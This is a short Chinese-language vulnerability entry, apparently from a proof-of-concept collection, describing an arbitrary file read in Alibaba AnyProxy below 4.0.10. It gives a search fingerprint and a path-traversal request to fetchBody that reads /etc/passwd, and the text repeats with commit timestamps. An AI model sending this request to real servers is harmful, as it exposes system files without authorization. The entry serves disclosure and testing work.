Awesome-POC/Web应用漏洞/Alibaba AnyProxy fetchBody 任意文件读取漏洞.md

# Alibaba AnyProxy fetchBody 任意文件读取漏洞

## 漏洞描述

Alibaba AnyProxy 低版本存在任意文件读取，通过漏洞，攻击者可以获取服务器敏感信息

## 漏洞影响

```
Alibaba AnyProxy < 4.0.10
```

## 网络测绘

```
"anyproxy"
```

## 漏洞复现

页面如下

![](./images/202202102008909.png)


验证POC为

```plain
/fetchBody?id=1/../../../../../../../../etc/passwd
```


![](./images/202202102008683.png)
Web应用漏洞 2022-05-17 17:43:20 +08:00			`# Alibaba AnyProxy fetchBody 任意文件读取漏洞`

			`## 漏洞描述`

			`Alibaba AnyProxy 低版本存在任意文件读取，通过漏洞，攻击者可以获取服务器敏感信息`

			`## 漏洞影响`

			```
			`Alibaba AnyProxy < 4.0.10`
			```

更新漏洞 2023-08-28 15:55:36 +08:00			`## 网络测绘`
Web应用漏洞 2022-05-17 17:43:20 +08:00
			```
			`"anyproxy"`
			```

			`## 漏洞复现`

			`页面如下`

更新漏洞 2022-12-05 11:09:28 +08:00			`![](./images/202202102008909.png)`
Web应用漏洞 2022-05-17 17:43:20 +08:00


			`验证POC为`

			```plain
			`/fetchBody?id=1/../../../../../../../../etc/passwd`
			```



更新漏洞 2022-12-05 11:09:28 +08:00			`![](./images/202202102008683.png)`
Web应用漏洞 2022-05-17 17:43:20 +08:00